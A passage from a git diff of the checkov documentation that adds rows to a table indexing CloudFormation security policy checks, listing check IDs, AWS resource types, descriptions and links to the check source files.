+|  89 | CKV_AWS_97  | resource | AWS::ECS::TaskDefinition                  | Ensure Encryption in transit is enabled for EFS volumes in ECS Task definitions                                                                                                                          | Cloudformation | [ECSTaskDefinitionEFSVolumeEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ECSTaskDefinitionEFSVolumeEncryption.py)                                       |
+|  90 | CKV_AWS_99  | resource | AWS::Glue::SecurityConfiguration          | Ensure Glue Security Configuration Encryption is enabled                                                                                                                                                 | Cloudformation | [GlueSecurityConfiguration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/GlueSecurityConfiguration.py)                                                             |
+|  91 | CKV_AWS_100 | resource | AWS::EKS::Nodegroup                       | Ensure AWS EKS node group does not have implicit SSH access from 0.0.0.0/0                                                                                                                               | Cloudformation | [EKSNodeGroupRemoteAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/EKSNodeGroupRemoteAccess.py)                                                               |
+|  92 | CKV_AWS_101 | resource | AWS::Neptune::DBCluster                   | Ensure Neptune logging is enabled                                                                                                                                                                        | Cloudformation | [NeptuneClusterLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/NeptuneClusterLogging.py)                                                                     |
+|  93 | CKV_AWS_103 | resource | AWS::ElasticLoadBalancingV2::Listener     | Ensure that Load Balancer Listener is using at least TLS v1.2                                                                                                                                            | Cloudformation | [ALBListenerTLS12.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ALBListenerTLS12.py)                                                                               |
+|  94 | CKV_AWS_104 | resource | AWS::DocDB::DBClusterParameterGroup       | Ensure DocumentDB has audit logs enabled                                                                                                                                                                 | Cloudformation | [DocDBAuditLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/DocDBAuditLogs.py)                                                                                   |
+|  95 | CKV_AWS_105 | resource | AWS::Redshift::ClusterParameterGroup      | Ensure Redshift uses SSL                                                                                                                                                                                 | Cloudformation | [RedShiftSSL.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/RedShiftSSL.py)                                                                                         |
+|  96 | CKV_AWS_107 | resource | AWS::IAM::Group                           | Ensure IAM policies does not allow credentials exposure                                                                                                                                                  | Cloudformation | [IAMCredentialsExposure.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMCredentialsExposure.py)                                                                   |
+|  97 | CKV_AWS_107 | resource | AWS::IAM::ManagedPolicy                   | Ensure IAM policies does not allow credentials exposure                                                                                                                                                  | Cloudformation | [IAMCredentialsExposure.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMCredentialsExposure.py)                                                                   |
+|  98 | CKV_AWS_107 | resource | AWS::IAM::Policy                          | Ensure IAM policies does not allow credentials exposure                                                                                                                                                  | Cloudformation | [IAMCredentialsExposure.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMCredentialsExposure.py)                                                                   |
+|  99 | CKV_AWS_107 | resource | AWS::IAM::Role                            | Ensure IAM policies does not allow credentials exposure                                                                                                                                                  | Cloudformation | [IAMCredentialsExposure.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMCredentialsExposure.py)                                                                   |
+| 100 | CKV_AWS_107 | resource | AWS::IAM::User                            | Ensure IAM policies does not allow credentials exposure                                                                                                                                                  | Cloudformation | [IAMCredentialsExposure.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMCredentialsExposure.py)                                                                   |
+| 101 | CKV_AWS_108 | resource | AWS::IAM::Group                           | Ensure IAM policies does not allow data exfiltration                                                                                                                                                     | Cloudformation | [IAMDataExfiltration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMDataExfiltration.py)                                                                         |
+| 102 | CKV_AWS_108 | resource | AWS::IAM::ManagedPolicy                   | Ensure IAM policies does not allow data exfiltration                                                                                                                                                     | Cloudformation | [IAMDataExfiltration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMDataExfiltration.py)                                                                         |
+| 103 | CKV_AWS_108 | resource | AWS::IAM::Policy                          | Ensure IAM policies does not allow data exfiltration                                                                                                                                                     | Cloudformation | [IAMDataExfiltration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMDataExfiltration.py)                                                                         |
+| 104 | CKV_AWS_108 | resource | AWS::IAM::Role                            | Ensure IAM policies does not allow data exfiltration                                                                                                                                                     | Cloudformation | [IAMDataExfiltration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMDataExfiltration.py)                                                                         |
+| 105 | CKV_AWS_108 | resource | AWS::IAM::User                            | Ensure IAM policies does not allow data exfiltration                                                                                                                                                     | Cloudformation | [IAMDataExfiltration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMDataExfiltration.py)                                                                         |
+| 106 | CKV_AWS_109 | resource | AWS::IAM::Group                           | Ensure IAM policies does not allow permissions management without constraints                                                                                                                            | Cloudformation | [IAMPermissionsManagement.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMPermissionsManagement.py)                                                               |
+| 107 | CKV_AWS_109 | resource | AWS::IAM::ManagedPolicy                   | Ensure IAM policies does not allow permissions management without constraints                                                                                                                            | Cloudformation | [IAMPermissionsManagement.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMPermissionsManagement.py)                                                               |
+| 108 | CKV_AWS_109 | resource | AWS::IAM::Policy                          | Ensure IAM policies does not allow permissions management without constraints                                                                                                                            | Cloudformation | [IAMPermissionsManagement.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMPermissionsManagement.py)                                                               |
+| 109 | CKV_AWS_109 | resource | AWS::IAM::Role                            | Ensure IAM policies does not allow permissions management without constraints                                                                                                                            | Cloudformation | [IAMPermissionsManagement.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMPermissionsManagement.py)                                                               |
+| 110 | CKV_AWS_109 | resource | AWS::IAM::User                            | Ensure IAM policies does not allow permissions management without constraints                                                                                                                            | Cloudformation | [IAMPermissionsManagement.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMPermissionsManagement.py)                                                               |
+| 111 | CKV_AWS_110 | resource | AWS::IAM::Group                           | Ensure IAM policies does not allow privilege escalation                                                                                                                                                  | Cloudformation | [IAMPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMPrivilegeEscalation.py)                                                                   |
+| 112 | CKV_AWS_110 | resource | AWS::IAM::ManagedPolicy                   | Ensure IAM policies does not allow privilege escalation                                                                                                                                                  | Cloudformation | [IAMPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMPrivilegeEscalation.py)                                                                   |
+| 113 | CKV_AWS_110 | resource | AWS::IAM::Policy                          | Ensure IAM policies does not allow privilege escalation                                                                                                                                                  | Cloudformation | [IAMPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMPrivilegeEscalation.py)                                                                   |
+| 114 | CKV_AWS_110 | resource | AWS::IAM::Role                            | Ensure IAM policies does not allow privilege escalation                                                                                                                                                  | Cloudformation | [IAMPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMPrivilegeEscalation.py)                                                                   |
+| 115 | CKV_AWS_110 | resource | AWS::IAM::User                            | Ensure IAM policies does not allow privilege escalation                                                                                                                                                  | Cloudformation | [IAMPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMPrivilegeEscalation.py)                                                                   |
+| 116 | CKV_AWS_111 | resource | AWS::IAM::Group                           | Ensure IAM policies does not allow write access without constraints                                                                                                                                      | Cloudformation | [IAMWriteAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMWriteAccess.py)                                                                                   |
+| 117 | CKV_AWS_111 | resource | AWS::IAM::ManagedPolicy                   | Ensure IAM policies does not allow write access without constraints                                                                                                                                      | Cloudformation | [IAMWriteAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMWriteAccess.py)                                                                                   |
+| 118 | CKV_AWS_111 | resource | AWS::IAM::Policy                          | Ensure IAM policies does not allow write access without constraints                                                                                                                                      | Cloudformation | [IAMWriteAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMWriteAccess.py)                                                                                   |
+| 119 | CKV_AWS_111 | resource | AWS::IAM::Role                            | Ensure IAM policies does not allow write access without constraints                                                                                                                                      | Cloudformation | [IAMWriteAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMWriteAccess.py)                                                                                   |
+| 120 | CKV_AWS_111 | resource | AWS::IAM::User                            | Ensure IAM policies does not allow write access without constraints                                                                                                                                      | Cloudformation | [IAMWriteAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMWriteAccess.py)                                                                                   |
+| 121 | CKV_AWS_115 | resource | AWS::Lambda::Function                     | Ensure that AWS Lambda function is configured for function-level concurrent execution limit                                                                                                              | Cloudformation | [LambdaFunctionLevelConcurrentExecutionLimit.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/LambdaFunctionLevelConcurrentExecutionLimit.py)                         |
+| 122 | CKV_AWS_115 | resource | AWS::Serverless::Function                 | Ensure that AWS Lambda function is configured for function-level concurrent execution limit                                                                                                              | Cloudformation | [LambdaFunctionLevelConcurrentExecutionLimit.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/LambdaFunctionLevelConcurrentExecutionLimit.py)                         |
+| 123 | CKV_AWS_116 | resource | AWS::Lambda::Function                     | Ensure that AWS Lambda function is configured for a Dead Letter Queue(DLQ)                                                                                                                               | Cloudformation | [LambdaDLQConfigured.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/LambdaDLQConfigured.py)                                                                         |
+| 124 | CKV_AWS_116 | resource | AWS::Serverless::Function                 | Ensure that AWS Lambda function is configured for a Dead Letter Queue(DLQ)                                                                                                                               | Cloudformation | [LambdaDLQConfigured.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/LambdaDLQConfigured.py)                                                                         |
+| 125 | CKV_AWS_117 | resource | AWS::Lambda::Function                     | Ensure that AWS Lambda function is configured inside a VPC                                                                                                                                               | Cloudformation | [LambdaInVPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/LambdaInVPC.py)                                                                                         |
+| 126 | CKV_AWS_117 | resource | AWS::Serverless::Function                 | Ensure that AWS Lambda function is configured inside a VPC                                                                                                                                               | Cloudformation | [LambdaInVPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/LambdaInVPC.py)                                                                                         |
+| 127 | CKV_AWS_118 | resource | AWS::RDS::DBInstance                      | Ensure that enhanced monitoring is enabled for Amazon RDS instances                                                                                                                                      | Cloudformation | [RDSEnhancedMonitorEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/RDSEnhancedMonitorEnabled.py)                                                             |
+| 128 | CKV_AWS_119 | resource | AWS::DynamoDB::Table                      | Ensure DynamoDB Tables are encrypted using a KMS Customer Managed CMK                                                                                                                                    | Cloudformation | [DynamoDBTablesEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/DynamoDBTablesEncrypted.py)                                                                 |
+| 129 | CKV_AWS_120 | resource | AWS::ApiGateway::Stage                    | Ensure API Gateway caching is enabled                                                                                                                                                                    | Cloudformation | [APIGatewayCacheEnable.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/APIGatewayCacheEnable.py)                                                                     |
+| 130 | CKV_AWS_120 | resource | AWS::Serverless::Api                      | Ensure API Gateway caching is enabled                                                                                                                                                                    | Cloudformation | [APIGatewayCacheEnable.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/APIGatewayCacheEnable.py)                                                                     |
+| 131 | CKV_AWS_123 | resource | AWS::EC2::VPCEndpointService              | Ensure that VPC Endpoint Service is configured for Manual Acceptance                                                                                                                                     | Cloudformation | [VPCEndpointAcceptanceConfigured.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/VPCEndpointAcceptanceConfigured.py)                                                 |
+| 132 | CKV_AWS_131 | resource | AWS::ElasticLoadBalancingV2::LoadBalancer | Ensure that ALB drops HTTP headers                                                                                                                                                                       | Cloudformation | [ALBDropHttpHeaders.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ALBDropHttpHeaders.py)                                                                           |
+| 133 | CKV_AWS_136 | resource | AWS::ECR::Repository                      | Ensure that ECR repositories are encrypted using KMS                                                                                                                                                     | Cloudformation | [ECRRepositoryEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ECRRepositoryEncrypted.py)                                                                   |
+| 134 | CKV_AWS_149 | resource | AWS::SecretsManager::Secret               | Ensure that Secrets Manager secret is encrypted using KMS CMK                                                                                                                                            | Cloudformation | [SecretManagerSecretEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/SecretManagerSecretEncrypted.py)                                                       |
+| 135 | CKV_AWS_154 | resource | AWS::Redshift::Cluster                    | Ensure Redshift is not deployed outside of a VPC                                                                                                                                                         | Cloudformation | [RedshiftInEc2ClassicMode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/RedshiftInEc2ClassicMode.py)                                                               |
+| 136 | CKV_AWS_155 | resource | AWS::WorkSpaces::Workspace                | Ensure that Workspace user volumes are encrypted                                                                                                                                                         | Cloudformation | [WorkspaceUserVolumeEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/WorkspaceUserVolumeEncrypted.py)                                                       |
+| 137 | CKV_AWS_156 | resource | AWS::WorkSpaces::Workspace                | Ensure that Workspace root volumes are encrypted                                                                                                                                                         | Cloudformation | [WorkspaceRootVolumeEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/WorkspaceRootVolumeEncrypted.py)                                                       |
+| 138 | CKV_AWS_157 | resource | AWS::RDS::DBInstance                      | Ensure that RDS instances have Multi-AZ enabled                                                                                                                                                          | Cloudformation | [RDSMultiAZEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/RDSMultiAZEnabled.py)                                                                             |
+| 139 | CKV_AWS_158 | resource | AWS::Logs::LogGroup                       | Ensure that CloudWatch Log Group is encrypted by KMS                                                                                                                                                     | Cloudformation | [CloudWatchLogGroupKMSKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/CloudWatchLogGroupKMSKey.py)                                                               |
+| 140 | CKV_AWS_160 | resource | AWS::Timestream::Database                 | Ensure that Timestream database is encrypted with KMS CMK                                                                                                                                                | Cloudformation | [TimestreamDatabaseKMSKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/TimestreamDatabaseKMSKey.py)                                                               |
+| 141 | CKV_AWS_161 | resource | AWS::RDS::DBInstance                      | Ensure RDS database has IAM authentication enabled                                                                                                                                                       | Cloudformation | [RDSIAMAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/RDSIAMAuthentication.py)                                                                       |
+| 142 | CKV_AWS_162 | resource | AWS::RDS::DBCluster                       | Ensure RDS cluster has IAM authentication enabled                                                                                                                                                        | Cloudformation | [RDSClusterIAMAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/RDSClusterIAMAuthentication.py)                                                         |
+| 143 | CKV_AWS_163 | resource | AWS::ECR::Repository                      | Ensure ECR image scanning on push is enabled                                                                                                                                                             | Cloudformation | [ECRImageScanning.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ECRImageScanning.py)                                                                               |
+| 144 | CKV_AWS_164 | resource | AWS::Transfer::Server                     | Ensure Transfer Server is not exposed publicly.                                                                                                                                                          | Cloudformation | [TransferServerIsPublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/TransferServerIsPublic.py)                                                                   |
+| 145 | CKV_AWS_165 | resource | AWS::DynamoDB::GlobalTable                | Ensure DynamoDB global table point in time recovery (backup) is enabled                                                                                                                                  | Cloudformation | [DynamodbGlobalTableRecovery.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/DynamodbGlobalTableRecovery.py)                                                         |
+| 146 | CKV_AWS_166 | resource | AWS::Backup::BackupVault                  | Ensure Backup Vault is encrypted at rest using KMS CMK                                                                                                                                                   | Cloudformation | [BackupVaultEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/BackupVaultEncrypted.py)                                                                       |
+| 147 | CKV_AWS_170 | resource | AWS::QLDB::Ledger                         | Ensure QLDB ledger permissions mode is set to STANDARD                                                                                                                                                   | Cloudformation | [QLDBLedgerPermissionsMode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/QLDBLedgerPermissionsMode.py)                                                             |
+| 148 | CKV_AWS_172 | resource | AWS::QLDB::Ledger                         | Ensure QLDB ledger has deletion protection enabled                                                                                                                                                       | Cloudformation | [QLDBLedgerDeletionProtection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/QLDBLedgerDeletionProtection.py)                                                       |
+| 149 | CKV_AWS_173 | resource | AWS::Lambda::Function                     | Check encryption settings for Lambda environment variable                                                                                                                                                | Cloudformation | [LambdaEnvironmentEncryptionSettings.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/LambdaEnvironmentEncryptionSettings.py)                                         |
+| 150 | CKV_AWS_173 | resource | AWS::Serverless::Function                 | Check encryption settings for Lambda environment variable                                                                                                                                                | Cloudformation | [LambdaEnvironmentEncryptionSettings.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/LambdaEnvironmentEncryptionSettings.py)                                         |
+| 151 | CKV_AWS_174 | resource | AWS::CloudFront::Distribution             | Verify CloudFront Distribution Viewer Certificate is using TLS v1.2                                                                                                                                      | Cloudformation | [CloudFrontTLS12.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/CloudFrontTLS12.py)                                                                                 |
+| 152 | CKV_AWS_187 | resource | AWS::SageMaker::Domain                    | Ensure Sagemaker domain and notebook instance are encrypted by KMS using a customer managed Key (CMK)                                                                                                    | Cloudformation | [SagemakerNotebookEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/SagemakerNotebookEncryptedWithCMK.py)                                             |
+| 153 | CKV_AWS_187 | resource | AWS::SageMaker::NotebookInstance          | Ensure Sagemaker domain and notebook instance are encrypted by KMS using a customer managed Key (CMK)                                                                                                    | Cloudformation | [SagemakerNotebookEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/SagemakerNotebookEncryptedWithCMK.py)                                             |
+| 154 | CKV_AWS_192 | resource | AWS::WAFv2::WebACL                        | Ensure WAF prevents message lookup in Log4j2. See CVE-2021-44228 aka log4jshell                                                                                                                          | Cloudformation | [WAFACLCVE202144228.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/WAFACLCVE202144228.py)                                                                           |
+| 155 | CKV_AWS_193 | resource | AWS::AppSync::GraphQLApi                  | Ensure AppSync has Logging enabled                                                                                                                                                                       | Cloudformation | [AppSyncLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/AppSyncLogging.py)                                                                                   |
+| 156 | CKV_AWS_194 | resource | AWS::AppSync::GraphQLApi                  | Ensure AppSync has Field-Level logs enabled                                                                                                                                                              | Cloudformation | [AppSyncFieldLevelLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/AppSyncFieldLevelLogs.py)                                                                     |
+| 157 | CKV_AWS_195 | resource | AWS::Glue::Crawler                        | Ensure Glue component has a security configuration associated                                                                                                                                            | Cloudformation | [GlueSecurityConfigurationEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/GlueSecurityConfigurationEnabled.py)                                               |
+| 158 | CKV_AWS_195 | resource | AWS::Glue::DevEndpoint                    | Ensure Glue component has a security configuration associated                                                                                                                                            | Cloudformation | [GlueSecurityConfigurationEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/GlueSecurityConfigurationEnabled.py)                                               |
+| 159 | CKV_AWS_195 | resource | AWS::Glue::Job                            | Ensure Glue component has a security configuration associated                                                                                                                                            | Cloudformation | [GlueSecurityConfigurationEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/GlueSecurityConfigurationEnabled.py)                                               |
+| 160 | CKV_AWS_197 | resource | AWS::AmazonMQ::Broker                     | Ensure MQ Broker Audit logging is enabled                                                                                                                                                                | Cloudformation | [MQBrokerAuditLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/MQBrokerAuditLogging.py)                                                                       |
+| 161 | CKV_AWS_258 | resource | AWS::Lambda::Url                          | Ensure that Lambda function URLs AuthType is not None                                                                                                                                                    | Cloudformation | [LambdaFunctionURLAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/LambdaFunctionURLAuth.py)                                                                     |
+| 162 | CKV_AWS_260 | resource | AWS::EC2::SecurityGroup                   | Ensure no security groups allow ingress from 0.0.0.0:0 to port 80                                                                                                                                        | Cloudformation | [SecurityGroupUnrestrictedIngress80.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/SecurityGroupUnrestrictedIngress80.py)                                           |
+| 163 | CKV_AWS_260 | resource | AWS::EC2::SecurityGroupIngress            | Ensure no security groups allow ingress from 0.0.0.0:0 to port 80                                                                                                                                        | Cloudformation | [SecurityGroupUnrestrictedIngress80.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/SecurityGroupUnrestrictedIngress80.py)                                           |
+| 164 | CKV_AWS_291 | resource | AWS::MSK::Cluster                         | Ensure MSK nodes are private                                                                                                                                                                             | Cloudformation | [MSKClusterNodesArePrivate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/MSKClusterNodesArePrivate.py)                                                             |
+| 165 | CKV_AWS_317 | resource | AWS::Elasticsearch::Domain                | Ensure Elasticsearch Domain Audit Logging is enabled                                                                                                                                                     | Cloudformation | [ElasticsearchDomainAuditLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ElasticsearchDomainAuditLogging.py)                                                 |
+| 166 | CKV_AWS_317 | resource | AWS::OpenSearchService::Domain            | Ensure Elasticsearch Domain Audit Logging is enabled                                                                                                                                                     | Cloudformation | [ElasticsearchDomainAuditLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ElasticsearchDomainAuditLogging.py)                                                 |
+| 167 | CKV_AWS_360 | resource | AWS::DocDB::DBCluster                     | Ensure DocumentDB has an adequate backup retention period                                                                                                                                                | Cloudformation | [DocDBBackupRetention.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/DocDBBackupRetention.py)                                                                       |
+| 168 | CKV_AWS_361 | resource | AWS::Neptune::DBCluster                   | Ensure that Neptune DB cluster has automated backups enabled with adequate retention                                                                                                                     | Cloudformation | [NeptuneClusterBackupRetention.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/NeptuneClusterBackupRetention.py)                                                     |
+| 169 | CKV_AWS_363 | resource | AWS::Lambda::Function                     | Ensure Lambda Runtime is not deprecated                                                                                                                                                                  | Cloudformation | [DeprecatedLambdaRuntime.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/DeprecatedLambdaRuntime.py)                                                                 |
+| 170 | CKV_AWS_363 | resource | AWS::Serverless::Function                 | Ensure Lambda Runtime is not deprecated                                                                                                                                                                  | Cloudformation | [DeprecatedLambdaRuntime.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/DeprecatedLambdaRuntime.py)                                                                 |
+| 171 | CKV_AWS_364 | resource | AWS::Lambda::Permission                   | Ensure that AWS Lambda function permissions delegated to AWS services are limited by SourceArn or SourceAccount                                                                                          | Cloudformation | [LambdaServicePermission.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/LambdaServicePermission.py)                                                                 |
+| 172 | CKV_AWS_366 | resource | AWS::Cognito::IdentityPool                | Ensure AWS Cognito identity pool does not allow unauthenticated guest access                                                                                                                             | Cloudformation | [CognitoUnauthenticatedIdentities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/CognitoUnauthenticatedIdentities.py)                                               |
+| 173 | CKV_AWS_367 | resource | AWS::SageMaker::DataQualityJobDefinition  | Ensure Amazon Sagemaker Data Quality Job uses KMS to encrypt model artifacts                                                                                                                             | Cloudformation | [SagemakerDataQualityJobDefinitionEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/SagemakerDataQualityJobDefinitionEncryption.py)                         |
+| 174 | CKV_AWS_368 | resource | AWS::SageMaker::DataQualityJobDefinition  | Ensure Amazon Sagemaker Data Quality Job uses KMS to encrypt data on attached storage volume                                                                                                             | Cloudformation | [SagemakerDataQualityJobDefinitionVolumeEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/SagemakerDataQualityJobDefinitionVolumeEncryption.py)             |
+| 175 | CKV_AWS_369 | resource | AWS::SageMaker::DataQualityJobDefinition  | Ensure Amazon Sagemaker Data Quality Job encrypts all communications between instances used for monitoring jobs                                                                                          | Cloudformation | [SagemakerDataQualityJobDefinitionTrafficEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/SagemakerDataQualityJobDefinitionTrafficEncryption.py)           |
+| 176 | CKV_AWS_370 | resource | AWS::SageMaker::Model                     | Ensure Amazon SageMaker model uses network isolation                                                                                                                                                     | Cloudformation | [SagemakerModelWithNetworkIsolation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/SagemakerModelWithNetworkIsolation.py)                                           |
+| 177 | CKV_AWS_371 | resource | AWS::SageMaker::NotebookInstance          | Ensure Amazon SageMaker Notebook Instance only allows for IMDSv2                                                                                                                                         | Cloudformation | [SagemakerNotebookInstanceAllowsIMDSv2.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/SagemakerNotebookInstanceAllowsIMDSv2.py)                                     |
+| 178 | CKV_AWS_373 | resource | AWS::Bedrock::Agent                       | Ensure Bedrock Agent is encrypted with a CMK                                                                                                                                                             | Cloudformation | [BedrockAgentEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/BedrockAgentEncrypted.py)                                                                     |
+| 179 | CKV2_AWS_33 | resource | AWS::AppSync::GraphQLApi                  | Ensure AppSync is protected by WAF                                                                                                                                                                       | Cloudformation | [AppSyncProtectedByWAF.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/graph_checks/AppSyncProtectedByWAF.yaml)                                                                 |
+| 180 | CKV2_AWS_68 | resource | AWS::IAM::Role                            | Ensure SageMaker notebook instance IAM policy is not overly permissive                                                                                                                                   | Cloudformation | [SageMakerIAMPolicyOverlyPermissiveToAllTraffic.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/graph_checks/SageMakerIAMPolicyOverlyPermissiveToAllTraffic.yaml)               |
+| 181 | CKV2_AWS_68 | resource | AWS::SageMaker::NotebookInstance          | Ensure SageMaker notebook instance IAM policy is not overly permissive                                                                                                                                   | Cloudformation | [SageMakerIAMPolicyOverlyPermissiveToAllTraffic.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/graph_checks/SageMakerIAMPolicyOverlyPermissiveToAllTraffic.yaml)               |
 
 
 ---
diff --git a/docs/5.Policy Index/serverless.md b/docs/5.Policy Index/serverless.md
index 9653e5f4850..b4c4912b821 100644
--- a/docs/5.Policy Index/serverless.md	
+++ b/docs/5.Policy Index/serverless.md	
@@ -88,104 +88,118 @@ nav_order: 1
